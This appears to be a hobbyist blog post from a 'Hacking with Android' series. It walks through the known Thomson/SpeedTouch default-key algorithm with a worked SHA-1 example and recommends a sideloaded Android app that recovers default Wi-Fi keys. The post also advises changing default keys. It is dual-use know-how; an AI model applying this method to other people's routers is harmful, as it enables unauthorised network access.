In part 3 of Hacking with Android series we speak about Thomson Default Key Algorithm presented by GNUCitizen team that let us calculate the default passwords on many Thomson routers and then we use an Android application named Thomson WPA Finder to exploit this vulnerability with an android device.
So in this method we have:
S/N -> hash -> default SSID and encryption keywhich can be read as: a hashed version of the router’s serial number is generated which is then used to derive both, the default SSID and the default encryption key. This is just a high-level overview of the algorithm.
- Take as example: “CP0615JT109 (53)”
- Remove the CC and PP values: CP0615109
- Convert the “XXX” values to hexadecimal: CP0615313039
- Process with SHA-1: 742da831d2b657fa53d347301ec610e1ebf8a3d0
- The last 3 bytes are converted to 6 byte string, and appended to the word “SpeedTouch” which becomes the default SSID: SpeedTouchF8A3D0
- The first 5 bytes are converted to a 10 byte string which becomes the default WEP/WPA key: 742DA831D2
My advice is: use WPA/WPA-2 rather than WEP and change the default encryption key now, to something STRONG!
To install it, download the .apk from the download link and install it as unknown source app from a file manager. After installing it, it will request some download, do it and it will be ready for use. There are many apps like this but I find this easy and fast with no problems in all years that I use it.
Everything you are going to see is for educational purposes only, so operate carefully and in your own property. I bring no responsibility in what happens to you if you act irresponsibly.
Device used: Xiaomi Hongmi 1S (Android 4.4)
Thank You For Watching.:)